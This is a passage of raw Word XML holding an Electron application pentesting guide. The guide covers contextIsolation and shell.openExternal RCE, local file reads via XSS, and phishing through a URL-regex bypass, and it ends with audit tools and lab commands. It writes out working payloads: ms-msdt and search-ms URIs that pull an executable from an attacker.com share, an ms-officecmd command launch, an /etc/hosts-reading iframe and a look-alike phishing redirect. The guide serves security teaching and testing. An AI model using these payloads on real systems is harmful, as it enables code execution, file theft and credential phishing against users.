        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B0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contextIsolation</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> RCE via preload </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B0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code</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r>
        <w:r w:rsidRPr="00AE3B0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Electron</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B0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contextIsolation</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> RCE via Electron internal </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B0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code</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:caps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PAGE</w:t>
        </w:r>
        <w:r w:rsidRPr="00AE3B0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Electron</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B0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contextIsolation</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00AE3B0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 xml:space="preserve"> RCE via IPC</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20DE624E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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass click </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E6E0EC0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lastRenderedPageBreak/>
        <w:t xml:space="preserve">If there are restrictions applied when you click a link you might be able to bypass them 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doing a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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middle</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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click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instead of a regular left click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F388902" w14:textId="73FB2013" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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6ECE07A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window.addEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('click', (e) =&gt; { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C7E7C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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>shell.openExternal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="253D56E8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For more info about this examples check </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8</w:t>
        </w:r>
      </w:hyperlink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and </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://benjamin-altpeter.de/shell-openexternal-dangers/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D3BBF6C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hen deploying an Electron desktop application, ensuring the correct settings for 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nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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is crucial. It's established that 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client-side remote code execution (RCE)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targeting preload scripts or Electron's native code from the main process is effectively prevented with these settings in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B7477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Upon a user interacting with links or opening new windows, specific event listeners are triggered, which are crucial for the application's security and functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761FD816" w14:textId="1F1466BC" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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EB1C28C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webContents.on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("</w:t>
      </w:r>
      <w:proofErr w:type="gram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new-window</w:t>
      </w:r>
      <w:proofErr w:type="gram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", function (event, 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url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, disposition, options) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448146C2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webContents.on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("will-navigate", function (event, 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url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) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E844869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These listeners are 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overridden by the desktop application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to implement its own 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business logic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. The application evaluates whether a navigated link should be opened internally or in an external web browser. This decision is typically made through a function, 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openInternally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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. If this function returns </w:t>
      </w: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false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, it indicates that the link should be opened externally, utilizing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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shell.openExternal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAA602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Here is a simplified pseudocode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F679B" w14:textId="0F0928A2" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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73FA232" wp14:editId="3557B899">
            <wp:extent cx="5731510" cy="19189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666B8" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352F90A3" w14:textId="2CC36377" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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F3E3527" wp14:editId="4978AB7D">
            <wp:extent cx="5731510" cy="2237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C975A" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7453D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Electron JS security best practices advise against accepting untrusted content with the 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openExternal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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function, as it could lead to RCE through various protocols. Operating systems support different protocols that might trigger RCE. For detailed examples and further explanation on this topic, one can refer to </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:anchor="windows-10-19042" w:history="1">
        <w:r w:rsidRPr="00AE3B0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this resource</w:t>
        </w:r>
      </w:hyperlink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, which includes Windows protocol examples capable of exploiting this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10882495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Examples of Windows protocol exploits include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F01F6D" w14:textId="1A053B64" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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3F27464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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0767C100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proofErr w:type="gram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window.open</w:t>
      </w:r>
      <w:proofErr w:type="gram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("ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3263D7F8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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B611D0F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</w:p>
    <w:p w14:paraId="17A4ABBB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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235CF243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proofErr w:type="gram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window.open</w:t>
      </w:r>
      <w:proofErr w:type="gram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("search-ms:query=malicious_executable.exe&amp;crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&amp;displayname=Important%20update")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6B933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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BBB098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</w:p>
    <w:p w14:paraId="4C72939B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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629579B9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window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&amp;&amp;%2520%22%22%7D%7D")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B94F0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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D6FCA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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading Internal Files: XSS + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14F65F7E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Disabling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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contextIsolation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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enables the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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webview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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&gt;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tags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, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&lt;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iframe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&gt;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, for reading and exfiltrating local files. An example provided demonstrates how to exploit this vulnerability to read the contents of internal files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA26B6" w14:textId="2774847F" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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089DC9A" wp14:editId="7106A854">
            <wp:extent cx="5731510" cy="1906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BE7F6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Further, another method for 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reading an internal file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is shared, highlighting a critical local file read vulnerability in an Electron desktop app. This involves injecting a script to exploit the application and exfiltrate data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AEAC05" w14:textId="5FAAD8D6" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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80A2BFC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&lt;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br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&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946392A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&lt;h1&gt;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pwn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&lt;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br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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060BD934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&lt;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iframe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onload=</w:t>
      </w:r>
      <w:proofErr w:type="gram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j(</w:t>
      </w:r>
      <w:proofErr w:type="gram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) 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src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="/etc/hosts"&gt;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xssxsxxsxs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&lt;/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iframe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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98444F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&lt;script type="text/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javascript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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8148D0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   function </w:t>
      </w:r>
      <w:proofErr w:type="gram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j(</w:t>
      </w:r>
      <w:proofErr w:type="gram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){alert('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pwned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contents of /etc/hosts :\n\n '+frames[0].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document.body.innerText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)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD343A7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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD753AE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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-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RCE: XSS + Old Chromium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB21758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If the 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chromium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used by the application is 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old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and there are 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known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vulnerabilities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on it, it might be possible to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit it and obtain RCE through </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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XSS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. You can see an example in this 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writeup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: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://blog.electrovolt.io/posts/discord-rce/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A3682B4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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-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XSS Phishing via Internal URL regex bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78411744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Supposing you found a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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XSS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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but you 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cannot trigger RCE or steal internal files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you could try to use it to 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steal credentials via phishing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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742690C6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First of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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you need to know what happen when you try to open a new URL, checking the JS code in the front-end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068CEC8D" w14:textId="0B7F21FA" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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75B90FF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webContents.on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("</w:t>
      </w:r>
      <w:proofErr w:type="gram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new-window</w:t>
      </w:r>
      <w:proofErr w:type="gram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", function (event, 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url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, disposition, options) {} // opens the custom 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openInternally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function (it is declared below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6742F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webContents.on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("will-navigate", function (event, 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url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) </w:t>
      </w:r>
      <w:proofErr w:type="gram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{}   </w:t>
      </w:r>
      <w:proofErr w:type="gram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                // opens the custom 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openInternally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function (it is declared below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433F7FB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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openInternally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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will decide if the 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link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will be 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opened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in the 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desktop window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as it's a link belonging to the platform, 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or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if will be opened in the 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browser as a 3rd party resource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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BD27E9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In the case the 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regex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used by the function is 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vulnerable to bypasses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(for example by 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not escaping the dots of subdomains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) an attacker could abuse the XSS to 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open a new window which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will be located in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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infrastructure </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3B07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asking for credentials</w:t>
      </w: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to the user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB0D350" w14:textId="715F0D66" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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9A76A59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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A79A58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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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window.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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("&lt;http://subdomainagoogleq.com/index.html&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8FCC8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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D666431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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-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Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E75FB" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs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Electronegativity</w:t>
        </w:r>
      </w:hyperlink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is a tool to identify misconfigurations and security anti-patterns in Electron-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0F148" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId23" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs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Electrolint</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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is an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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VS Code plugin for Electron applications that uses Electronegativity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64551B7D" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId24" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs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nodejsscan</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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to check for vulnerable third party </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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libraries</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="300C7D6D" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00AE3B07">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs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Electro.ng</w:t>
        </w:r>
      </w:hyperlink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: You need to buy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6A349177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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD7E62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In </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://www.youtube.com/watch?v=xILfQGkLXQo&amp;t=22s</w:t>
        </w:r>
      </w:hyperlink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you can find a lab to exploit vulnerable Electron apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A674FA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Some commands that will help you will the lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E292EE" w14:textId="066E1DC4" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B0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C2B94D1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# Download apps from these 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URls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EF90665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# Vuln to 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nodeIntegration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02771CD3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https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E996CBF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# Vuln to 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contextIsolation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via preload script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEDA7AA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https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E461228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# Vuln to IPC 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Rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31334380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https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B15D78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</w:p>
    <w:p w14:paraId="2D5B8183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# Get inside the electron app and check for vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A844BEB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npm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audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30613B3B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</w:p>
    <w:p w14:paraId="1D2A1D81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# How to use electronegativity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA93E2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npm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install @doyensec/electronegativity -</w:t>
      </w:r>
      <w:proofErr w:type="gram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g</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57C843E1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electronegativity -</w:t>
      </w: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i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vulnerable1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0F577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</w:p>
    <w:p w14:paraId="2935B132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# Run an application from source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB9246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npm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install -g </w:t>
      </w:r>
      <w:proofErr w:type="gram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electron</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0187495F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lastRenderedPageBreak/>
        <w:t>cd vulnerable1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E166EFE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</w:pP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npm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</w:t>
      </w:r>
      <w:proofErr w:type="gram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install</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DACE9ED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npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AE3B07">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New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start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D9724BA" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B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pacing w:val="-3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b/>
          <w:bCs/>
          <w:spacing w:val="-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References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68E8AF" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05B357D2" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C3CC963" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5306BA59" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://www.youtube.com/watch?v=a-YnG3Mx-Tg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4427CAF0" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://www.youtube.com/watch?v=xILfQGkLXQo&amp;t=22s</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45A13486" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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More </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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researches</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AE3B0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and write-ups about Electron security in </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://github.com/doyensec/awesome-electronjs-hacking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5468E2A1" w14:textId="77777777" w:rsidR="00AE3B07" w:rsidRPr="00AE3B07" w:rsidRDefault="00AE3B07" w:rsidP="00AE3B07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hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00AE3B0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https://www.youtube.com/watch?v=Tzo8ucHA5xw&amp;list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&amp;index=81</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E5D871F" w14:textId="77777777" w:rsidR="00240D72" w:rsidRPr="00AE3B07" w:rsidRDefault="00240D72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00240D72" w:rsidRPr="00AE3B07">
      <w:footerReference w:type="even" r:id="rId34"/>
      <w:footerReference w:type="default" r:id="rId35"/>
      <w:footerReference w:type="firs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FC7A0" w14:textId="77777777" w:rsidR="009B7C55" w:rsidRDefault="009B7C55" w:rsidP="00AE3B07">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
